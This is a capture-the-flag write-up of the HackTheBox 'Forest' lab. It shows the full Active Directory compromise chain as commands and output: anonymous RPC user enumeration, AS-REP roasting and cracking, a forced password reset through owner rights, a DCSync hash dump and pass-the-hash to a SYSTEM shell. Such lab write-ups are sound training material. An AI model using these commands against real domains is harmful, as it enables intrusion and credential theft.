![[HackTheBox] Forest](https://cdn.hashnode.com/res/hashnode/image/upload/v1733663055448/4acd7a6c-ccc6-4d8d-b3aa-0d8b43c8d8ea.png?w=1600&h=840&fit=crop&crop=entropy&auto=compress,format&format=webp)
Just another RPC / Port ranges / NTLMSSP / ASREPRoast / User DACL Abuse (RPC passwd) / DCSync Write-up.
There might be some discrepencies in this article. Indeed, I will sometimes use
cme, and some other timesnxc. The methodology, however, remains identical. In the context of this article,cmeandnxcare interchangeable.
Footprinting
Open ports
I used, just to change a bit, masscan for the TCP port scan, coupled with an Nmap Script Engine scan to look for vulnerabilities on each open service on the target:
jamarir@kali:~$ sudo masscan -p1-65535 10.10.10.161 --rate=1000 -e tun0 > ports
jamarir@kali:~$ cat ports
Discovered open port 49703/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 49670/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 49667/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
jamarir@kali:~$ nmap -Pn -sV -sC 10.10.10.161 -v2 -oN nse.nmap -p$(grep -oPz '(?s)(?<=Discovered open port )\d+(?=\/tcp)' ports |tr '\0' '\n' |sort -u |tr '\n' ',' |grep -oP '.*(?=.)')
[...]
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: <DATE>)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
[...]
|_clock-skew: mean: 2h46m51s, deviation: 4h37m09s, median: 6m50s
The Netbios/SMB (139/445), RPC (135,593), WinRM (5985) services reveal this is a Windows machine.
The LDAP/S (389/636), DNS (53), but especially the Kerberos (88) services reveal this machine is a DC (Domain Controller).
First things first, let’s add that machine to our local DNS resolver:
jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.10.161' /etc/resolv.conf
I’ve done the above command on a Kali Virtual Machine. If you’re running a Windows attacker machine, you’ll have to update your Open VPN’s network device’s DNS:
Also, because the machine has port 445 open, we may do a quick CrackMapExec enumeration on that SMB protocol to get its FQDN (Fully Qualified Domain Name): FOREST.htb.local
jamarir@kali:~$ cme smb 10.10.10.161
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
What are these RPC’s 496xy ports ?!
TLDR: RPC is a default Windows service, accessible on ports 135 (RPC), 139/445 (Netbios/SMB), 593 (HTTP), or 49xyz+.
You may check the Microsoft documentation on RPC, on Service overview and network port requirements for Windows, RFC6335 for the IANA (Internet Assigned Numbers Authority)’s port registration, or Hacktricks, among many resources, to get more details about the RPC protocol.
MSRPC (MicroSoft Remote Procedure Call) is a client-server protocol that allows programs to send commands over the network. RPC manages most of the networking processes, which allows programmers to focus on application’s details, rather than networking issues. For instance, developers can transparently communicate between different types of process (32-bit, 64-bit, 32-bit under 64-bit systems (WOW64)), letting RPC automatically manage the process differences behind the scenes.
This protocol can either be accessed from :
RPC on port 135.
SMB on port 139/445.
HTTP on port 593.
But what are all these 49??? ports in the Nmap’s output ? As RFC6335 states, there are 3 kind of port ranges:
The System / Well Known Ports, from 0-1023, assigned by IANA.
The User / Registered Ports, from 1024-49151, assigned by IANA.
The Dynamic / Private / Ephemeral Ports, from 49152-65535, never assigned.
Thus, the ports 49152 to 65535 are free to use by the system. Most frequently, these ports are assigned to client programs to open a temporary session on a target. For example, whe a client visits an HTTPS website, the server-side port is 443, but the client-side port used to communication is any port after 49152.
For example, on a default Windows 11 machine, we can see some of the same ports (496xy) open as out target:
PS C:\Users\jamarir> netstat -ano |Select-String -Pattern '(?<=\[::\]:496\d{2}.*)\d+(\s*)$' |findstr /v '^$'
TCP [::]:49664 [::]:0 LISTENING 784
TCP [::]:49665 [::]:0 LISTENING 628
TCP [::]:49666 [::]:0 LISTENING 1436
TCP [::]:49667 [::]:0 LISTENING 1920
TCP [::]:49669 [::]:0 LISTENING 2944
TCP [::]:49670 [::]:0 LISTENING 764
We may retrieve these services’ names using the following PowerShell tricks:
PS C:\Users\jamarir> (netstat -ano |Select-String -Pattern '(?<=\[::\]:496\d{2}.*)\d+(\s*)$').Matches.Value -Join ','
784,628,1436,1920,2944,764
PS C:\Users\jamarir> Get-Process -Id 784,628,1436,1920,2944,764
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1398 27 7324 21924 784 0 lsass
661 13 4868 10200 764 0 services
421 21 5156 13224 2944 0 spoolsv
400 19 5892 16576 1436 0 svchost
415 14 15420 14816 1920 0 svchost
142 11 1408 6652 628 0 wininit
We could also have simply used the Process Explorer tool from the Sysinternals’s suite.
Without going into too much in-depth details (and honestly, I won’t be able to) :
More details can be found in the nasbench’s article.
lsass.exeis the LSA (Local Security Authority) Subsystem Service which verifies users logging onto a Windows computer or server, enforces local security policies, handles password changes, creates access tokens, and writes the Windows Security Log. Task Manager shows it’s run by SYSTEM with the description “Local Security Authority Process“.services.exeis the SCM (Service Control Manager), started at system boot. It maintains the database of installed services, starts/stops services upon demand, etc.. Task Manager shows it’s run by SYSTEM with the description “Services and Controller app“.spoolsv.exe(Spooler Service) is an API allowing applications to manage printers and print job. Task Manager shows it’s run by SYSTEM with the description “Spooler SubSystemApp“.svchost.exe(Service Host) allows services’ groups to run in independant instances of the Service Host process, which prevents issues accross instances. Task Manager shows it’s run by SERVICE LOCAL with the description “Host Process for Windows Service“.wininit.exe(Window Initialization) sets the environment variables, creates theW:\Windows\Temp\folder, launchesservices.exe/lsass.exe, etc.. The Task Manager shows it’s run by SYSTEM with the description “Windows Start-Up Application“.
Anonymous Rpc2Users ?
We are allowed to interact anonymously with the RPC service in Kali using the tool rpcclient, or enum4linux:
jamarir@kali:~$ enum4linux -a -u '' -p '' 10.10.10.161 -w htb.local > enum4linux.txt
jamarir@kali:~$ cat enum4linux.txt
[...]
[+] Getting domain group memberships:
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
[...]
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Here, we can use RPC via an anonymous SMB session using rpcclient:
jamarir@kali:~$ rpcclient 10.10.10.161 -U '%' -c "enumdomusers;quit" > enumdomusers.txt
jamarir@kali:~$ cat enumdomusers.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
[...]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
And retrieve the usernames using the following grep PCRE expression:
jamarir@kali:~$ grep -oP 'user:\[\K.*?(?=\])' enumdomusers.txt > users.txt
Quick NTLMSSP discussion
Looking at the Wireshark traffic for rpcclient, we can see our attacking machine (10.10.14.20) tries to connect to port 445 (SMB), or port 139 (Netbios) if it failed:
Then, we perform an NTLMSSP authentication, over SMB2, with a blank username and password:
NTLMSSP (NT Lan Manager Security Support Provider) is the NTLM authentication protocol over RPC (where option AuthnSvc=RPC_C_AUTHN_WINNT).
Microsoft NTLM is a Windows Challenge/Response authentication protocol, which is either:
Interactive (logon authentication), with 2 entities:
client,DC.Noninteractive (client already authenticated), with 3 entities:
client,server,DC.
A client is a <domain>/<username>:<NTHash> tuple, where NTHash is calculated based on its password. A noninteractive NTLM authentication process is basically made up of 4 exchanges:
The client NEGOTIATEs a connection to a server, sending its username.
The service CHALLENGEs the client, asking him to encrypt a nonce (8-byte random number).
The client AUTHENTICATEs to the server, encrypting the nonce with its NTHash.
The server asks the DC if it can replay/check that encryption. If the encryptions match, the DC validates the client’s identity, who can then access the server’s service.
Image taken from the Microsoft’s documentation.
The client’s password is NOT sent/disclosed in the network. Instead, its NTHash is used (as for the Kerberos’s KRB_AS_REQ message). This NTHash is only known by 2 entities: the client, and the DC (in its local SAM (Security Account Manager) database). That’s the reason why the server must forward the AUTHENTICATE message to the DC for verification.
Thus, after the NTLM authentication succeeded, we can get our EnumDomainUsers's response, with 31 users returned:
These entries are retrieved via the SAMR (SAM Remote) Protocol, a protocol used to manage accounts over the network.
ASREPRoast
You may check my Sauna article for more details on this attack.
We have bunch of users, let's check if any of these are ASREPRoastable (i.e. we may impersonate any domain user’s TGT without a password):
jamarir@kali:~$ nxc ldap 10.10.10.161 -u users.txt -p '' --kdcHost 10.10.10.161 --asreproast ASREProastables.txt
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[...]
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP 10.10.10.161 445 FOREST $krb5asrep$23$svc-alfresco@HTB.LOCAL:b5e67e44a9b56929fe6ba89bc329f735$76e3bc4fa76ba01e8d4cc44517b94d1eaf749895d455429aa90d31d4484b6b82874f8987766db11687a377d179932934b16aff21764f2a70d36a8cc3b7f8ea4ee5db3c269de75cb570a206c06148890cea3e52e0d734b65915bc554e87992d2de4bac46e46b38809eda8bccc0b6b1c739efaa45b62d58744cfe75fd66a99fb9efdba1fe5d58e6654c3c09ac9da56fc523218dc1cafb6c3708ca9c8a09fc799097552d5d87d5ab5d1d1562e98b6c3b72a97720ff6659c55dfebbea142cff49d6817d55e6b1072cd903dbae9c4aeb668f349a3681c6edb3aa2aecf253fd5cfbb3ba1d07893425c
User svc-alfresco is ASREPRoastable. Thus we may ask a TGT on its behalf to the DC, and crack the NTHash in KRB_AS_REP response:
jamarir@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hash
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
Nice ! We have the creds HTB.LOCAL\svc-alfresco:s3rvice. This user is a domain user, and has access to the LDAP service:
jamarir@kali:~$ nxc ldap 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] htb.local\svc-alfresco:s3rvice
Then, we can use BloodHound.py as our LDAP collector, and mark svc-alfresco as owned in BloodHound:
jamarir@kali:~$ ./bloodhound.py -u 'svc-alfresco' -p 's3rvice' -d 'HTB.LOCAL' -dc FOREST.HTB.LOCAL -ns 10.10.10.161 -c all --zip
The Service Accounts OU (Organizational Unit) is a member of the Remote Management Users’s group. This group allows users to get a remote shell through WinRM (port 5985 on the DC). Therefore, any user member of that OU can, transitively, access WinRM.
jamarir@kali:~$ nxc ldap 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' -d 'HTB.LOCAL' --query "(&(memberOf=CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL))" "objectCategory member"
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] HTB.LOCAL\svc-alfresco:s3rvice
LDAP 10.10.10.161 389 FOREST [+] Response for object: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
LDAP 10.10.10.161 389 FOREST member: CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
LDAP 10.10.10.161 389 FOREST objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local
svc-alfresco is in that OU:
jamarir@kali:~$ nxc ldap 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' -d 'HTB.LOCAL' --query "(memberOf=CN=Service Accounts,OU=Security Groups,DC=htb,DC=local)" "distinguishedName"
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] HTB.LOCAL\svc-alfresco:s3rvice
LDAP 10.10.10.161 389 FOREST [+] Response for object: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
LDAP 10.10.10.161 389 FOREST distinguishedName: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
So we can get a remote shell over the network using evil-winrm, and retrieve the user flag !
jamarir@kali:~$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Get-Content ../desktop/user.txt
42[...]1c
Privilege Escalation
SVC-ALFRESCO can DACL abuse users ? L4g1t !
In BloodHound, we can look for all the shortest paths to Domain Admins, which returns the following layout:
In particular, SVC-ALFRESCO is said to “own” the domain account MAX, who can himself DCSync. Note that the attack vector path is also applicable to the user BEANI. Indeed, both MAX and BEANI are “owned” by SVC-ALFRESCO, and both can DCSync (=GetChanges + GetChangesAll) the domain:
Looking at the BloodHound’s help popup over the Owns link shows:
This privilege we have as SVC-ALFRESCO on users can be exploited in 2 different ways, as Hacktricks shows:
Exploit a “Targeted Kerberoast”, where we set an SPN to the owned user. Then, the targeted user becomes Kerberoastable, so we may crack its TGS.
Force a password update on the targeted user to impersonate him.
Let’s change MAX’s password to newP@ssword2022 using net rpc password:
jamarir@kali:~$ net rpc password 'max' 'newP@ssword2022' -U 'htb.local'/'svc-alfresco'%'s3rvice' -S forest.htb.local
MAX can DCSync ? L4g1t !
Finally, as shown in the above BloodHound, MAX can DCSync. Then, we can steal domain users’ NTHashes:
jamarir@kali:~$ impacket-secretsdump 'htb.local/max:newP@ssword2022'@10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:883047df6f072ada89dab57def574896:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
sahil:9601:aad3b435b51404eeaad3b435b51404ee:7a8f5acf21f7006f2106cfddf5207484:::
max:9603:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
beani:9605:aad3b435b51404eeaad3b435b51404ee:0a8f0259f4a2eb307ec5913983a38c54:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:fbed4bd65897ad2846930f05bc8b93c4:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[...]
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
And Pass-The-Hash the Domain Admin Administrator:
jamarir@kali:~$ impacket-psexec 'htb.local/administrator@10.10.10.161' -hashes ':32693b11e6aa90eb43d32c72a07ceea6'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file zrEJBePj.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service ySjR on 10.10.10.161.....
[*] Starting service ySjR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
GG WP !
C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
c9[...]88
